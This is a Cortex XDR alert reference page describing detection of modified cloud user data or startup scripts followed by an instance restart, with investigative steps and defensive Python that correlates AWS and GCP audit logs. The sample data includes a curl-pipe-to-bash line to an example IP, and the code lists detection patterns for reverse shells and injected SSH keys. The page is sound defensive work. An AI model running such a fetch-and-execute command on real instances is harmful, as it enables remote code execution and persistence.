Suspicious cloud user data modification attempt followed by VM restart

Cortex XDR Analytics Alert Reference by data source

Product
Cortex XDR
Last date published
2026-05-18
Category
Analytics Alert Reference
Index by
data source

Synopsis

Activation Period

14 Days

Training Period

30 Days

Test Period

1 Hour

Deduplication Period

1 Day

Required Data

  • Requires one of the following data sources:
    • AWS Audit Log
      OR
    • Gcp Audit Log

Detection Modules

Cloud

Detector Tags

ATT&CK Tactic

Execution (TA0002)

ATT&CK Technique

Cloud Administration Command (T1651)

Severity

Low

Description

The user data of a cloud instance (the script the instance executes at boot: EC2 user data on AWS, the startup-script metadata on GCP) was modified and the instance was then restarted. The sequence may be an attempt to have the instance run the altered startup script on boot rather than a routine configuration change.

Attacker's Goals

Execute arbitrary code, establish persistence, or alter instance startup behavior through modified user data.

Investigative actions

  • Review the identity that modified the instance user data (on AWS the ModifyInstanceAttribute call with the userData attribute, which only succeeds on a stopped instance; on GCP the compute.instances.setMetadata call that changed a startup-script key) and whether that identity normally administers the instance.
  • Confirm that the restart (StartInstances or RebootInstances on AWS; instances.start or instances.reset on GCP) came from the same identity or session as the modification.
  • Inspect the user data script for malicious content such as download-and-execute one-liners, added users or SSH keys, or reverse shells. On AWS, cloud-init runs user data only on an instance's first boot unless the script forces per-boot execution, so also look for a cloud-config section that makes scripts-user run on every boot (for Windows instances, a <persist>true</persist> tag has the same effect); on GCP, startup scripts run on every boot.
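As an added illustration of the sequence this alert looks for (example code written for this page, not the Cortex XDR detector, whose logic the page does not describe), the Python below normalizes constructed CloudTrail and GCP audit-log records, pairs each user-data or startup-script change with a restart of the same instance inside a one-hour window, and decodes the user data for the content check in the last investigative action. The record shapes are simplified, the one-hour window is an assumption chosen to match the Test Period above, the triage patterns are a starting list rather than anything the product uses, and the identities and addresses in the samples are fictitious.

```python
import base64
import re
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(hours=1)  # assumption: chosen to match the 1 Hour Test Period
# AWS: user data changes via ModifyInstanceAttribute (attribute userData) on a
# stopped instance, so StartInstances/RebootInstances follows. GCP: the startup
# script is instance metadata, so setMetadata is followed by reset or start.
AWS_RESTART = {"StartInstances", "RebootInstances"}
GCP_RESTART = {"v1.compute.instances.reset", "v1.compute.instances.start"}
GCP_SCRIPT_KEYS = {"startup-script", "startup-script-url", "windows-startup-script-ps1"}


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def normalize_aws(rec):
    """CloudTrail record -> list of (ts, actor, instance_id, kind); simplified field layout."""
    ts, actor = parse_ts(rec["eventTime"]), rec["userIdentity"]["arn"]
    p = rec.get("requestParameters", {})
    if rec["eventName"] == "ModifyInstanceAttribute" and "userData" in p:
        return [(ts, actor, p["instanceId"], "modify")]
    if rec["eventName"] in AWS_RESTART:  # instancesSet may list several IDs
        return [(ts, actor, i["instanceId"], "restart") for i in p["instancesSet"]["items"]]
    return []


def normalize_gcp(rec):
    """GCP audit-log entry -> list of (ts, actor, instance_name, kind); simplified field layout."""
    pl = rec["protoPayload"]
    ts, actor = parse_ts(rec["timestamp"]), pl["authenticationInfo"]["principalEmail"]
    inst = pl["resourceName"].rsplit("/", 1)[-1]
    if pl["methodName"].endswith("compute.instances.setMetadata"):
        keys = {i["key"] for i in pl.get("request", {}).get("items", [])}
        # only startup-script keys matter; if the request body is not logged, stay conservative
        return [(ts, actor, inst, "modify")] if not keys or keys & GCP_SCRIPT_KEYS else []
    if pl["methodName"] in GCP_RESTART:
        return [(ts, actor, inst, "restart")]
    return []


def correlate(events):
    """Pair each script change with the first restart of that instance inside WINDOW."""
    restarts = sorted(e for e in events if e[3] == "restart")
    alerts = []
    for m_ts, m_actor, inst, kind in sorted(events):
        if kind != "modify":
            continue
        for r_ts, r_actor, r_inst, _ in restarts:
            if r_inst == inst and m_ts < r_ts <= m_ts + WINDOW:
                alerts.append({"instance": inst, "modified_by": m_actor, "restarted_by": r_actor,
                               "seconds_to_restart": int((r_ts - m_ts).total_seconds())})
                break
    return alerts


# Crude triage patterns for the decoded script (assumption: extend with your own).
SUSPICIOUS = [r"(curl|wget)[^|\n]*\|\s*(ba)?sh", r"base64\s+(-d|--decode)",
              r"/dev/tcp/", r"\bnc\b.*\s-e\s", r"authorized_keys"]


def inspect_user_data(b64):
    """Decode base64 user data (the form DescribeInstanceAttribute returns) and flag patterns."""
    script = base64.b64decode(b64).decode("utf-8", errors="replace")
    return script, [p for p in SUSPICIOUS if re.search(p, script)]


# Constructed sample input: documentation IP range, fictitious identities.
USER_DATA_B64 = base64.b64encode(b"#!/bin/bash\ncurl -s http://198.51.100.7/a.sh | bash\n").decode()
CONTRACTOR, OPS = "arn:aws:iam::123456789012:user/contractor", "arn:aws:iam::123456789012:role/ops"
def aws(ts, name, arn, params):
    return {"eventTime": ts, "eventName": name, "userIdentity": {"arn": arn}, "requestParameters": params}
SAMPLE_AWS = [
    aws("2026-05-18T10:00:00Z", "ModifyInstanceAttribute", CONTRACTOR,
        {"instanceId": "i-0aaa111", "userData": {"value": USER_DATA_B64}}),
    aws("2026-05-18T10:04:30Z", "StartInstances", CONTRACTOR, {"instancesSet": {"items": [{"instanceId": "i-0aaa111"}]}}),
    # instance-type change followed by a reboot: not a user-data change, must not alert
    aws("2026-05-18T11:00:00Z", "ModifyInstanceAttribute", OPS, {"instanceId": "i-0bbb222", "instanceType": {"value": "t3.large"}}),
    aws("2026-05-18T11:01:00Z", "RebootInstances", OPS, {"instancesSet": {"items": [{"instanceId": "i-0bbb222"}]}}),
]
ZONE = "projects/demo/zones/us-central1-a/instances/"
def gcp(ts, method, who, name, items=None):
    pl = {"methodName": method, "authenticationInfo": {"principalEmail": who}, "resourceName": ZONE + name}
    return {"timestamp": ts, "protoPayload": {**pl, **({"request": {"items": items}} if items else {})}}
SAMPLE_GCP = [
    # db-1: startup-script changed, but reset 2.5 h later, outside WINDOW -> no alert
    gcp("2026-05-18T09:00:00Z", "v1.compute.instances.setMetadata", "ops@example.com", "db-1",
        [{"key": "startup-script", "value": "#!/bin/bash\napt-get update"}]),
    gcp("2026-05-18T11:30:00Z", "v1.compute.instances.reset", "ops@example.com", "db-1"),
    # web-1: startup-script-url changed, reset five minutes later -> alert
    gcp("2026-05-18T10:20:00Z", "v1.compute.instances.setMetadata", "svc-ci@demo.iam.gserviceaccount.com",
        "web-1", [{"key": "startup-script-url", "value": "gs://demo-bucket/boot.sh"}]),
    gcp("2026-05-18T10:25:00Z", "v1.compute.instances.reset", "svc-ci@demo.iam.gserviceaccount.com", "web-1"),
]


def run_sample():
    events = [e for r in SAMPLE_AWS for e in normalize_aws(r)]
    events += [e for r in SAMPLE_GCP for e in normalize_gcp(r)]
    return correlate(events)
```

Running run_sample() on the constructed records yields two alerts: the AWS instance started 270 seconds after its user data changed, and the GCP instance reset five minutes after its startup-script-url changed. The instance-type change and the reset that falls outside the window produce nothing, which is the point of keying on the userData attribute and the startup-script keys rather than on any ModifyInstanceAttribute or setMetadata call. On AWS the current user data is retrieved with DescribeInstanceAttribute (attribute userData), which returns it base64-encoded, the form inspect_user_data expects.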